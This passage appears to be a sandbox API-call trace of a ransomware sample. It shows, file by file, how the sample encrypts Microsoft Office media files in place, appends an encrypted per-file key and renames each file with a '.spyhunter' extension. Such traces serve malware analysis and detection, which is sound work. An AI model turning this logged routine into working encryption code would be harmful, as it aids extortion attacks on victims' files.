Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 70 [0100.656] StrStrW (lpFirst="OFFICE10.MML", lpSrch=".txt") returned 0x0 [0100.656] GetProcessHeap () returned 0x2c0000 [0100.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0100.656] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0100.712] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.712] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f8e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8e4*=0x2800, lpOverlapped=0x0) returned 1 [0100.712] GetProcessHeap () returned 0x2c0000 [0100.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0100.712] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.712] WriteFile (in: hFile=0xec, lpBuffer=0x270f924*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8e4, lpOverlapped=0x0 | out: lpBuffer=0x270f924*, lpNumberOfBytesWritten=0x270f8e4*=0x4, lpOverlapped=0x0) returned 1 [0100.774] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8e4*=0x30, lpOverlapped=0x0) returned 1 [0100.774] CloseHandle (hObject=0xec) returned 1 [0100.774] GetProcessHeap () returned 0x2c0000 [0100.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.774] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.spyhunter") returned 80 [0100.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.spyhunter")) returned 1 [0100.775] GetProcessHeap () returned 0x2c0000 [0100.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.775] GetProcessHeap () returned 0x2c0000 [0100.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.775] GetProcessHeap () returned 0x2c0000 [0100.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c16c08 | out: hHeap=0x2c0000) returned 1 [0100.775] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f920 | out: pbBuffer=0x270f920) returned 1 [0100.775] GetProcessHeap () returned 0x2c0000 [0100.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.775] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f918*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f918*=0x30) returned 1 [0100.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14581_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.785] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF") returned 73 [0100.786] StrStrW (lpFirst="BD14581_.GIF", lpSrch=".txt") returned 0x0 [0100.786] GetProcessHeap () returned 0x2c0000 [0100.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.786] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8dc*=0xce, lpOverlapped=0x0) returned 1 [0100.787] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.787] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x270f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8dc*=0xce, lpOverlapped=0x0) returned 1 [0100.787] GetProcessHeap () returned 0x2c0000 [0100.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.787] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.787] WriteFile (in: hFile=0x16c, lpBuffer=0x270f91c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8dc, lpOverlapped=0x0 | out: lpBuffer=0x270f91c*, lpNumberOfBytesWritten=0x270f8dc*=0x4, lpOverlapped=0x0) returned 1 [0100.787] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8dc*=0x30, lpOverlapped=0x0) returned 1 [0100.787] CloseHandle (hObject=0x16c) returned 1 [0100.788] GetProcessHeap () returned 0x2c0000 [0100.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.788] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF.spyhunter") returned 83 [0100.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14581_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14581_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14581_.gif.spyhunter")) returned 1 [0100.788] GetProcessHeap () returned 0x2c0000 [0100.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.788] GetProcessHeap () returned 0x2c0000 [0100.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.788] GetProcessHeap () returned 0x2c0000 [0100.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af688 | out: hHeap=0x2c0000) returned 1 [0100.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f920 | out: pbBuffer=0x270f920) returned 1 [0100.789] GetProcessHeap () returned 0x2c0000 [0100.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f918*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f918*=0x30) returned 1 [0100.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14579_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.789] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF") returned 73 [0100.789] StrStrW (lpFirst="BD14579_.GIF", lpSrch=".txt") returned 0x0 [0100.789] GetProcessHeap () returned 0x2c0000 [0100.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.789] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8dc*=0x10b, lpOverlapped=0x0) returned 1 [0100.790] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffef5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.790] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x10b, lpNumberOfBytesWritten=0x270f8dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8dc*=0x10b, lpOverlapped=0x0) returned 1 [0100.791] GetProcessHeap () returned 0x2c0000 [0100.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.791] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.791] WriteFile (in: hFile=0x16c, lpBuffer=0x270f91c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8dc, lpOverlapped=0x0 | out: lpBuffer=0x270f91c*, lpNumberOfBytesWritten=0x270f8dc*=0x4, lpOverlapped=0x0) returned 1 [0100.791] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8dc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8dc*=0x30, lpOverlapped=0x0) returned 1 [0100.791] CloseHandle (hObject=0x16c) returned 1 [0100.791] GetProcessHeap () returned 0x2c0000 [0100.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.791] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF.spyhunter") returned 83 [0100.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14579_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14579_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14579_.gif.spyhunter")) returned 1 [0100.792] GetProcessHeap () returned 0x2c0000 [0100.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.792] GetProcessHeap () returned 0x2c0000 [0100.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.792] GetProcessHeap () returned 0x2c0000 [0100.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af4c8 | out: hHeap=0x2c0000) returned 1 [0100.792] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f918 | out: pbBuffer=0x270f918) returned 1 [0100.792] GetProcessHeap () returned 0x2c0000 [0100.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.793] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f910*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f910*=0x30) returned 1 [0100.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14578_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.794] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF") returned 73 [0100.794] StrStrW (lpFirst="BD14578_.GIF", lpSrch=".txt") returned 0x0 [0100.794] GetProcessHeap () returned 0x2c0000 [0100.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.794] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8d4*=0xc8, lpOverlapped=0x0) returned 1 [0100.795] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.795] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xc8, lpNumberOfBytesWritten=0x270f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8d4*=0xc8, lpOverlapped=0x0) returned 1 [0100.796] GetProcessHeap () returned 0x2c0000 [0100.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.796] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.796] WriteFile (in: hFile=0x16c, lpBuffer=0x270f914*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8d4, lpOverlapped=0x0 | out: lpBuffer=0x270f914*, lpNumberOfBytesWritten=0x270f8d4*=0x4, lpOverlapped=0x0) returned 1 [0100.796] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8d4*=0x30, lpOverlapped=0x0) returned 1 [0100.797] CloseHandle (hObject=0x16c) returned 1 [0100.797] GetProcessHeap () returned 0x2c0000 [0100.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.797] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF.spyhunter") returned 83 [0100.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14578_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14578_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14578_.gif.spyhunter")) returned 1 [0100.798] GetProcessHeap () returned 0x2c0000 [0100.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.798] GetProcessHeap () returned 0x2c0000 [0100.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.798] GetProcessHeap () returned 0x2c0000 [0100.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af3e8 | out: hHeap=0x2c0000) returned 1 [0100.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f918 | out: pbBuffer=0x270f918) returned 1 [0100.798] GetProcessHeap () returned 0x2c0000 [0100.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.798] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f910*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f910*=0x30) returned 1 [0100.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14565_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF") returned 73 [0100.799] StrStrW (lpFirst="BD14565_.GIF", lpSrch=".txt") returned 0x0 [0100.799] GetProcessHeap () returned 0x2c0000 [0100.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.799] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8d4*=0xb7, lpOverlapped=0x0) returned 1 [0100.800] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff49, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.800] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb7, lpNumberOfBytesWritten=0x270f8d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8d4*=0xb7, lpOverlapped=0x0) returned 1 [0100.800] GetProcessHeap () returned 0x2c0000 [0100.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.801] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.801] WriteFile (in: hFile=0x16c, lpBuffer=0x270f914*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8d4, lpOverlapped=0x0 | out: lpBuffer=0x270f914*, lpNumberOfBytesWritten=0x270f8d4*=0x4, lpOverlapped=0x0) returned 1 [0100.801] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8d4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8d4*=0x30, lpOverlapped=0x0) returned 1 [0100.801] CloseHandle (hObject=0x16c) returned 1 [0100.801] GetProcessHeap () returned 0x2c0000 [0100.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.801] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF.spyhunter") returned 83 [0100.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14565_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14565_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14565_.gif.spyhunter")) returned 1 [0100.802] GetProcessHeap () returned 0x2c0000 [0100.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.802] GetProcessHeap () returned 0x2c0000 [0100.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.802] GetProcessHeap () returned 0x2c0000 [0100.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af308 | out: hHeap=0x2c0000) returned 1 [0100.802] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f910 | out: pbBuffer=0x270f910) returned 1 [0100.802] GetProcessHeap () returned 0x2c0000 [0100.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.802] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f908*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f908*=0x30) returned 1 [0100.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14533_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.803] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF") returned 73 [0100.803] StrStrW (lpFirst="BD14533_.GIF", lpSrch=".txt") returned 0x0 [0100.803] GetProcessHeap () returned 0x2c0000 [0100.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.803] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8cc*=0xf5, lpOverlapped=0x0) returned 1 [0100.804] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.804] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0x270f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8cc*=0xf5, lpOverlapped=0x0) returned 1 [0100.804] GetProcessHeap () returned 0x2c0000 [0100.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.804] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.805] WriteFile (in: hFile=0x16c, lpBuffer=0x270f90c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8cc, lpOverlapped=0x0 | out: lpBuffer=0x270f90c*, lpNumberOfBytesWritten=0x270f8cc*=0x4, lpOverlapped=0x0) returned 1 [0100.805] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8cc*=0x30, lpOverlapped=0x0) returned 1 [0100.805] CloseHandle (hObject=0x16c) returned 1 [0100.805] GetProcessHeap () returned 0x2c0000 [0100.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.805] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF.spyhunter") returned 83 [0100.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14533_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14533_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14533_.gif.spyhunter")) returned 1 [0100.806] GetProcessHeap () returned 0x2c0000 [0100.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.806] GetProcessHeap () returned 0x2c0000 [0100.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.806] GetProcessHeap () returned 0x2c0000 [0100.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af228 | out: hHeap=0x2c0000) returned 1 [0100.806] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f910 | out: pbBuffer=0x270f910) returned 1 [0100.806] GetProcessHeap () returned 0x2c0000 [0100.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.806] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f908*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f908*=0x30) returned 1 [0100.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14532_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF") returned 73 [0100.807] StrStrW (lpFirst="BD14532_.GIF", lpSrch=".txt") returned 0x0 [0100.807] GetProcessHeap () returned 0x2c0000 [0100.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.807] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8cc*=0xf5, lpOverlapped=0x0) returned 1 [0100.808] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.808] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0x270f8cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8cc*=0xf5, lpOverlapped=0x0) returned 1 [0100.808] GetProcessHeap () returned 0x2c0000 [0100.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.808] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.808] WriteFile (in: hFile=0x16c, lpBuffer=0x270f90c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8cc, 